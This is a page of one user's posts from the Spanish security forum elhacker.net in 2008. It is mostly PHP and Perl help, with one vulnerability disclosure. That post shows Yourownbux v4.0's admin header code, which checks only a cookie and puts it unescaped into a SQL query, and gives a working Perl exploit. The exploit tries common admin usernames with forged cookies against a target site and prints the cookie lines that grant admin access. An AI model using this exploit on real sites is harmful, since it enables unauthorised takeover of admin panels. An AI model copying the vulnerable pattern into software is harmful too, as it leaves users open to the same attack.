elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Nivel Web / Re: Yourownbux v4.0 => Cookie Modification Exploit en: 13 Septiembre 2008, 18:58 pm
added :)

ps: are you the same as $pass = "Tec-n0x"; ? ;D

Yes, i Found the bug.

Link Milw0rm
12  Seguridad Informática / Nivel Web / Re: Yourownbux v4.0 => Cookie Modification Exploit en: 13 Septiembre 2008, 17:35 pm
Edito el mensaje:

Puse el fix pero bueno mejor no :P

La solucion es Simple: Validar la cookie UsPass

~Shinji~  : If you still want the fix contact me via MSN.

13  Seguridad Informática / Nivel Web / [°] Yourownbux v4.0 => Cookie Modification Exploit en: 11 Septiembre 2008, 03:51 am
Bueno, esto lo descubri hace un par de dias .. Ahora lo publico.

Vulnerable: /admin/header.php

Código
  1. <?php
  2.  
  3. $user = $_COOKIE["usNick"];
  4.  
  5. $myDb-&gt;connect();
  6.  
  7. $sql = "SELECT * FROM yob_users WHERE username='$user'";
  8.  
  9. $result = mysql_query($sql);
  10.  
  11. $row = mysql_fetch_array($result);
  12.  
  13. $myDb-&gt;close();
  14.  
  15. $is_admin = $row['user_status'];
  16.  
  17. if($is_admin != "admin"){
  18.  
  19. $display_error = "* You must login as administrator to access this page.";
  20.  
  21. include ('error.php'); exit();
  22.  
  23. }
  24.  
  25. ?>

Como pueden ver, Solo se valida la cookie usNick, por lo tanto si tienes el usuario admin correcto, añadiendo las cookies puedes tener acceso al admin panel.

Y un pequeño Exploit para la explotacion es el siguiente:

Código
  1. #!/usr/bin/perl
  2.  
  3. use LWP::UserAgent;
  4. use HTTP::Request;
  5.  
  6. #+-------------------------------------------------------------+-#
  7. #+ Yourownbux v4.0                   --------------------------+--+
  8. #+ Cookie Modification Exploit --------------------------++
  9. #+ Discovered By: Tec-n0x | 04/9/2008 --------------------++
  10. #
  11. # + Gr33tz: OzX, Celciuz, N.O.X && All Friends --++
  12. #+-------------------------------------------------------------+----#
  13.  
  14.  
  15.  
  16. system("clear");
  17.  
  18. # Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com
  19. \n# Thanks OzX\n\n";
  20. print "Target [ Example: www.sitedemo.com ] :\n> ";
  21. $target = <STDIN>;
  22. chop($target);
  23.  
  24. if($target =~ m/www\.(.*)\.(.*)/) {
  25.  
  26. $other = $1;
  27. check1($target);
  28.  
  29. } else {
  30. print "\nInvalid Target.";
  31. exit();
  32. }
  33.  
  34. sub explote {
  35.  
  36. @tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");
  37. # Add Posible Users.
  38.  
  39. $check = shift;
  40.  
  41. foreach $user (@tryusers) {
  42.  
  43. $pass = "Tec-n0x";
  44.  
  45. print "\n\tTrying > $user\n";
  46.  
  47. $browser = LWP::UserAgent->new();
  48. $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
  49. $browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
  50. $get = HTTP::Request->new(GET => $check);
  51. $resp = $browser->request($get);
  52. $content = $resp->content();
  53.  
  54. @code = split("\n",$content);
  55.  
  56. foreach $checka (@code) {
  57.  
  58. if($checka =~ m/Emails|Served|Workload|Overview/) {
  59.  
  60. system("clear");
  61.  
  62. print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";
  63.  
  64. $vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
  65. $vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";
  66.  
  67.  
  68. +------------------------------------+
  69. + $vd\n+ $vda
  70. +------------------------------------+
  71. ";
  72.  
  73.  
  74. $yes = 1;
  75.  
  76. exit();
  77.  
  78. }
  79. }
  80. }
  81.  
  82. if($yes != 1) {
  83.  
  84. print "\n\n\nExploit Failed";
  85.  
  86. exit();
  87.  
  88. }
  89.  
  90. }
  91. sub check1 {
  92.  
  93. $target = shift;
  94.  
  95. $check = "http\:\/\/$target\/admin\/index\.php";
  96.  
  97. $browser = LWP::UserAgent->new();
  98. $browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
  99. $get = HTTP::Request->new(GET => $check);
  100. $resp = $browser->request($get);
  101. $content = $resp->content();
  102.  
  103. @code = split("\n",$content);
  104.  
  105. foreach $checka (@code) {
  106.  
  107. if($checka =~ m/You must login as administrator to access this page/) {
  108.  
  109. print "Check 1 [ OK ]\n";
  110.  
  111. $success = 1;
  112.  
  113. explote($check);
  114.  
  115. }
  116.  
  117. }
  118.  
  119. if($sucess != 1) {
  120.  
  121. print "Failed";
  122.  
  123. exit();
  124.  
  125. }
  126.  
  127. }
  128.  

El Post original, Clickeando Aqui.

Saludos
14  Seguridad Informática / Nivel Web / Re: Codigo interesante?? como hariais sql injection?? en: 4 Septiembre 2008, 05:35 am
Buenas tardes.

Como podria hacer SQL injection con este codigo PHP??:
Código:
$lole=$_COOKIE["usNick"];

$tabla = mysql_query("SELECT * FROM tb_users where referer='$lole' ORDER BY id ASC");

Un saludo.

Hola .. te cuento que yo tambien me pase un buen rato tratando de buscar SQL Injection en PTC's [ " Secure " bux / yourownbux / etc ] .. Y eso no funciona ..

Fijate que mas abajo lo que hace es para verificar con mysql_nums_rows o algo parecido ..

Si es donde yo pienso ..

Saludos
15  Seguridad Informática / Nivel Web / Re: CSRF / XSRF - Cross Site Request Forgery en: 28 Agosto 2008, 03:29 am
me ayudas no me sale la imagen del capcha en el navedador gracias por el aporte

Pusiste como esta en el posT?

Código:
<img src="nombre_del_archivo.php">
16  Programación / PHP / Re: Ayuda para montar ptc en: 10 Agosto 2008, 21:54 pm
hola amigos me  gustaria si me pudieran ayudar para poder montar mi propia ptc por el momento en un servidor gratis, tengo los scripts pero hasta ahi llego :-[ espero sus respuestas

Es sencillo eso ..

El script que tienes trae un archivo con la consulta SQL .. seguro se llama " Database "

Vas a la base de datos de tu hosting .. y ejecutas la consulta ...

Configuras el " config.php " con los datos de tu BD y listo ..

 ;)
17  Programación / PHP / Re: Sistema de consultas en PHP en: 10 Agosto 2008, 02:21 am
La verdad que si, seria de gran ayuda tener el codigo hecho, porque soy muy novato en php y nunca antes habia intentado manejar bases de datos en otra cosa que no fueran archivos de TXT y suelo practica de codigos ya hechos y modificarlos para hacer pruebas y ganar experiencia, hombre no se si pudieran ayudarme a sacar el codigo o señalar una aplicacion pre fabricada con su autoria yo k se  >:(


ayuden a este pobre novato, gracias  :-[

Bueno, yo creo que una cosa es ayudarte con un codigo y otra prepararte el codigo.

http://phpya.com.ar
http://mysqlya.com.ar

Saludos
18  Programación / Scripting / Re: Instalación de Librerías / Modulos en Perl en: 10 Agosto 2008, 02:19 am
En Linux/Unix suele ser un poco mas interactivo. Solo se abre un terminal y nos logeamos a la terminal de perl, y a buscar driver o instalar   :D


bash-3.1# perl -MCPAN -e shell
CPAN: File::HomeDir loaded ok (v0.69)

cpan shell -- CPAN exploration and modules installation (v1.9205)
ReadLine support enabled                                         

cpan[1]>
cpan[2]> m BDB::mysql
No objects of type Module found for argument BDB::mysql

cpan[3]> m DBI
Module id = DBI
    DESCRIPTION  Generic Database Interface (see DBD modules)
    CPAN_USERID  TIMB (Tim Bunce <Tim.Bunce@pobox.com>)
    CPAN_VERSION 1.607
    CPAN_FILE    T/TI/TIMB/DBI-1.607.tar.gz
    DSLIP_STATUS MmcOp (mature,mailing-list,C,object-oriented,Standard-Perl)
    MANPAGE      DBI - Database independent interface for Perl
    INST_FILE    /usr/local/lib/perl5/site_perl/5.10.0/i686-linux/DBI.pm
    INST_VERSION 1.605


Gracias por eso .. no tenia idea de como se hacia ... en un rato cuando vaya al ubuntu lo probare ..

Saludos
19  Programación / PHP / Re: Sistema de consultas en PHP en: 8 Agosto 2008, 14:10 pm
logre ver en la red el sistema exacto que pretendo manejar es este


http://www.fipcolombia.com/consultasVer.php

no se si pudieran checar el enlace y el tipo de formulario y datos y como se manejan, para poder darme una idea en codigo de como llevarlo a la practica, gracias.


tomemos en cuenta que cuando las consultas se envian en el form, no se publican inmediatamente, se envian a algun lugar y estoy casi seguro que al responderles se publican.

¿?

Te he dicho arriba exactamente lo que quieres ... No querras que te pongamos el codigo hecho verdad?   :-\
20  Programación / PHP / Re: Sistema de consultas en PHP en: 7 Agosto 2008, 21:08 pm
Es sencillo ...

Pones un formulario pidiendo los datos:

Código:
<form action="2.php" method="POST">
Nombre: <input type="text" name="nombre">
Telefono: <input type="text" name="tel">

Y Luego en el otro archivo .. Recives los datos y los metes en la bd ...

Y Creas una columna llamada " approved " en la BD ...

Entonces, cuando alguien mande ... Le pones por default 0 .. y en el admin ..

Solo tienes que poner que cuando clickees en Aprovar .. con un update .. le ponga 1 al " approved "

y Luego con un bucle While ... muestras todos los registros de la bd ..

Y acuerdate pasar por htmlspecialchars / htmlentities las variables para evitar XSS / SQL Injection.

Saludos

Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines